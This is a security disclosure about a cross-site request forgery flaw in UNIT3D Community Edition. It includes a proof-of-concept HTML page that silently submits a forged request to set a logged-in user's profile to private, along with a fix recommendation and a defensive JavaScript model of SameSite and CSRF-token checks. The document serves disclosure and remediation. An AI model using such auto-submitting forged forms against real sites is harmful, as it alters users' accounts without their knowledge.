Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Aug 4th 2021
An attacker can change a user's profile state to private if a logged-in user visits the attacker's website.
🕵️♂️ Proof of Concept
- While logged in, open this `POC.html` in a browser
- You can then check that your profile state changed from public to private
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the form is sent as a GET request -->
    <form action="https://unit3d.site/users/UNIT3D/settings/private">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
This vulnerability lets an attacker force a user into an unintentional profile state change to private.
Tested on Edge, Firefox, Chrome and Safari.
You should set a CSRF token on such GET requests, or you can use POST instead of GET; then, because the cookie's SameSite attribute is Lax, requests from other origins could not carry the cookie.
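The recommendation above, as an added example that is not part of the original report or of UNIT3D's code: a small JavaScript model of when a SameSite=Lax session cookie is attached, and of how a GET route that changes state compares with a POST-only route that also checks a CSRF token. The function names, route labels and sample token are hypothetical, and the cookie is assumed to be set with an explicit SameSite=Lax attribute.

```javascript
// Added example: a simplified model, not UNIT3D code. All names are hypothetical.

// Browser side: is a cookie explicitly marked SameSite=Lax attached?
// Same-site requests always carry it; cross-site requests carry it only
// on a top-level navigation that uses a safe method such as GET.
function laxCookieSent(req) {
  if (!req.crossSite) return true;
  return req.topLevelNavigation && req.method === 'GET';
}

// Compare tokens without returning early at the first differing character.
function tokenMatches(expected, supplied) {
  if (typeof supplied !== 'string' || supplied.length !== expected.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ supplied.charCodeAt(i);
  }
  return diff === 0;
}

// Server side. 'before' models the reported route: state changes on GET.
// 'after' models the fix: POST only, plus a per-session CSRF token.
function handle(route, req, session, profile) {
  if (!laxCookieSent(req)) return 401;          // no session cookie arrived
  if (route === 'before') {
    if (req.method !== 'GET') return 405;
    profile.private = true;
    return 200;
  }
  if (req.method !== 'POST') return 405;        // GET no longer changes state
  if (!tokenMatches(session.csrfToken, req.csrfToken)) return 419; // Laravel's token-mismatch status
  profile.private = true;
  return 200;
}

// Constructed sample data (the token is a placeholder, not a real value).
const session = { csrfToken: 'constructed-token-0123456789abcdef' };
const forgedGet = { crossSite: true, method: 'GET', topLevelNavigation: true };
const forgedPost = { crossSite: true, method: 'POST', topLevelNavigation: true };
const ownForm = { crossSite: false, method: 'POST', topLevelNavigation: true,
                  csrfToken: session.csrfToken };

for (const [route, name, req] of [['before', 'forged GET', forgedGet],
    ['after', 'forged GET', forgedGet], ['after', 'forged POST', forgedPost],
    ['after', 'own form', ownForm]]) {
  const profile = { private: false };
  console.log(route, name, handle(route, req, session, profile), profile.private);
}
```

The same-site POST without a token is the case the token check exists for: SameSite only filters requests coming from other sites.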